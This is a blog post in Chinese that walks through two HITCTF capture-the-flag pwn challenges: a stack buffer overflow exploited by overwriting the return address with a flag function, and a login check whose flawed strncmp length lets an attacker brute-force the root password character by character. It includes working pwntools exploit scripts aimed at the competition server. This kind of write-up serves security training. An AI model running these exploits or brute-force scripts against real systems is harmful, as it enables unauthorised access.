<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>HITCTF PWN | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="HITCTF PWN1. STACK OVERFLOW1) 基本逻辑main函数调用vuln函数，vuln函数中输入name字符串：  2) 漏洞vuln函数中buf的地址是ebp-28h，即buf大小为0x28，但在读入字符串时，read参数是0x40，即栈溢出漏洞。 3) 漏洞利用保护机制： NX堆栈不可执行  在IDA的函数一栏发现有一个flag的函数，利用该函数执行shell ：  通过栈">
<meta property="og:type" content="article">
<meta property="og:title" content="HITCTF PWN">
<meta property="og:url" content="http://yoursite.com/2018/02/07/HITCTF-PWN/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="HITCTF PWN1. STACK OVERFLOW1) 基本逻辑main函数调用vuln函数，vuln函数中输入name字符串：  2) 漏洞vuln函数中buf的地址是ebp-28h，即buf大小为0x28，但在读入字符串时，read参数是0x40，即栈溢出漏洞。 3) 漏洞利用保护机制： NX堆栈不可执行  在IDA的函数一栏发现有一个flag的函数，利用该函数执行shell ：  通过栈">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/stackoverflow_1.png">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/stackoverflow_2.png">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/stackoverflow_3.png">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/login_1.png">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/login_2.png">
<meta property="og:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/login_3.png">
<meta property="og:updated_time" content="2018-02-07T09:30:08.506Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HITCTF PWN">
<meta name="twitter:description" content="HITCTF PWN1. STACK OVERFLOW1) 基本逻辑main函数调用vuln函数，vuln函数中输入name字符串：  2) 漏洞vuln函数中buf的地址是ebp-28h，即buf大小为0x28，但在读入字符串时，read参数是0x40，即栈溢出漏洞。 3) 漏洞利用保护机制： NX堆栈不可执行  在IDA的函数一栏发现有一个flag的函数，利用该函数执行shell ：  通过栈">
<meta name="twitter:image" content="http://yoursite.com/2018/02/07/HITCTF-PWN/stackoverflow_1.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-HITCTF-PWN" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/02/07/HITCTF-PWN/" class="article-date">
  <time datetime="2018-02-07T08:46:29.000Z" itemprop="datePublished">2018-02-07</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      HITCTF PWN
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="HITCTF-PWN"><a href="#HITCTF-PWN" class="headerlink" title="HITCTF PWN"></a>HITCTF PWN</h1><h2 id="1-STACK-OVERFLOW"><a href="#1-STACK-OVERFLOW" class="headerlink" title="1. STACK OVERFLOW"></a>1. STACK OVERFLOW</h2><h3 id="1-基本逻辑"><a href="#1-基本逻辑" class="headerlink" title="1) 基本逻辑"></a>1) 基本逻辑</h3><p>main函数调用vuln函数，vuln函数中输入name字符串：</p>
<p><img src="/2018/02/07/HITCTF-PWN/stackoverflow_1.png" alt="vuln函数"></p>
<h3 id="2-漏洞"><a href="#2-漏洞" class="headerlink" title="2) 漏洞"></a>2) 漏洞</h3><p>vuln函数中buf的地址是ebp-28h，即buf大小为0x28，但在读入字符串时，read参数是0x40，即栈溢出漏洞。</p>
<h3 id="3-漏洞利用"><a href="#3-漏洞利用" class="headerlink" title="3) 漏洞利用"></a>3) 漏洞利用</h3><p>保护机制： NX堆栈不可执行</p>
<p><img src="/2018/02/07/HITCTF-PWN/stackoverflow_2.png" alt="checksec"></p>
<p>在IDA的函数一栏发现有一个flag的函数，利用该函数执行shell ：</p>
<p><img src="/2018/02/07/HITCTF-PWN/stackoverflow_3.png" alt="flag函数"></p>
<p>通过栈溢出构造ROP：将vuln函数返回地址覆盖为flag，同时写入flag函数执行所需要的参数a1和a2。</p>
<h3 id="4-exp"><a href="#4-exp" class="headerlink" title="4) exp"></a>4) exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">flag_addr = <span class="number">0x080485DF</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line"></span><br><span class="line">    p= process(<span class="string">"./stackoverflow"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">    p = remote(<span class="string">"111.230.132.82"</span>,<span class="number">40000</span>)</span><br><span class="line"></span><br><span class="line">payload= <span class="string">'a'</span>*<span class="number">44</span></span><br><span class="line"></span><br><span class="line">payload += p32(flag_addr)</span><br><span class="line"></span><br><span class="line">payload += p32(<span class="number">0xdeadbeef</span>) + p32(<span class="number">0xdeadbeef</span>)+p32(<span class="number">12648430</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Welcome to pwn world!\nLeave your name:"</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="2-login"><a href="#2-login" class="headerlink" title="2.login"></a>2.login</h2><h3 id="1-基本逻辑-1"><a href="#1-基本逻辑-1" class="headerlink" title="1) 基本逻辑"></a>1) 基本逻辑</h3><p><img src="/2018/02/07/HITCTF-PWN/login_1.png" alt="main函数"></p>
<p>main函数首先调用login()函数，用户输入username和password后，与服务器端预设的值进行比较。有两个用户：root和lilac。需要注意的是，strncmp的第三个参数，这个参数代表需要比较多少个字符。仔细看login函数中的strncmp是有问题的。（见2.漏洞）</p>
<p><img src="/2018/02/07/HITCTF-PWN/login_2.png" alt="login"></p>
<p>从login返回之后，main函数会对登录是否成功进行判定，只有当用户为root且通过了login函数的比对操作才能继续进行，其余情况都会直接exit。而且即使login函数通过了之后，main函数还接着调用了check()函数来再次检查用户名和密码。注意，仔细查看login和check函数中的strncmp的第三个参数是不一样的：login中第三个参数是用户输入的长度，check中是指定的长度。</p>
<p><img src="/2018/02/07/HITCTF-PWN/login_3.png" alt="check"></p>
<h3 id="2-漏洞-1"><a href="#2-漏洞-1" class="headerlink" title="2) 漏洞"></a>2) 漏洞</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">n = read_input_raw(username, <span class="number">16</span>);</span><br><span class="line">v3 = read_input_raw(password, <span class="number">32</span>);</span><br><span class="line"><span class="keyword">if</span> ( !<span class="built_in">strncmp</span>(username,<span class="string">"root"</span>,n)&amp;&amp;!<span class="built_in">strncmp</span>(password,<span class="string">"passwd_has_be_changed_in_remote_"</span>, v3) )</span><br><span class="line"> &#123;</span><br><span class="line">   v1 = <span class="number">0</span>;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>login函数第三个参数是用户输入的字符串长度，比如，我们只输入一个字符，那么strncmp就只比较两个字符串的一个字符，如果恰巧蒙对了，strncmp就返回0（代表相等）；没蒙对就继续蒙，直到蒙到第一位是正确的。由此，可以通过暴力破解依次获取每一位password。需要注意的是，我们拿到的可执行文件和服务器上的不是一个，出题人在password处暗示我们了：passwd_has<em>be</em> changed_in<em>remote</em></p>
<h3 id="3-漏洞利用-1"><a href="#3-漏洞利用-1" class="headerlink" title="3) 漏洞利用"></a>3) 漏洞利用</h3><p>从check函数中可以看出，root用户的密码为32位。通过暴力破解，多次启动进程，从返回结果是否是”How can you login successful as root!”来判断该位是否正确。可以通过查看ASCII表中可见字符的范围来缩小暴力破解的次数，我用的是33-126。</p>
<h3 id="4-exp-1"><a href="#4-exp-1" class="headerlink" title="4) exp"></a>4) exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#暴力破解</span></span><br><span class="line">debug = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> num <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">32</span>):</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">126</span>):</span><br><span class="line">		<span class="keyword">if</span> debug:</span><br><span class="line">			p= process(<span class="string">"./login"</span>)</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			p = remote(<span class="string">"111.230.132.82"</span>,<span class="number">40001</span>)</span><br><span class="line">		p.recvuntil(<span class="string">"Username: "</span>)</span><br><span class="line">		username = <span class="string">"root"</span></span><br><span class="line">		p.sendline(username)</span><br><span class="line"></span><br><span class="line">		p.recvuntil(<span class="string">"Password: "</span>)</span><br><span class="line">		tmp = pwd+chr(i) </span><br><span class="line"></span><br><span class="line">		p.sendline(tmp)</span><br><span class="line">		hint = p.recvline()</span><br><span class="line">		<span class="comment">#print hint</span></span><br><span class="line">		<span class="keyword">if</span> <span class="string">"How can you login successful as root!"</span> <span class="keyword">in</span> hint:</span><br><span class="line">			pwd+=chr(i)</span><br><span class="line">			p.close()</span><br><span class="line">			<span class="keyword">print</span> pwd</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">		p.close()</span><br><span class="line"><span class="keyword">print</span> pwd</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#发送正确的username和password</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">debug = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">	p= process(<span class="string">"./login"</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">"111.230.132.82"</span>,<span class="number">40001</span>)</span><br><span class="line">    </span><br><span class="line">p.recvuntil(<span class="string">"Username: "</span>)</span><br><span class="line">username = <span class="string">"root"</span></span><br><span class="line">p.sendline(username)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Password: "</span>)</span><br><span class="line">pwd=<span class="string">"XXXXX"</span> <span class="comment">#此处就是上一步暴力破解获取的pwd</span></span><br><span class="line">p.sendline(pwd)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/02/07/HITCTF-PWN/" data-id="cjdcvkwtf0000n8u6bdylhojv" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2018/02/07/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/02/07/HITCTF-PWN/">HITCTF PWN</a>
          </li>
        
          <li>
            <a href="/2018/02/07/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2018 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>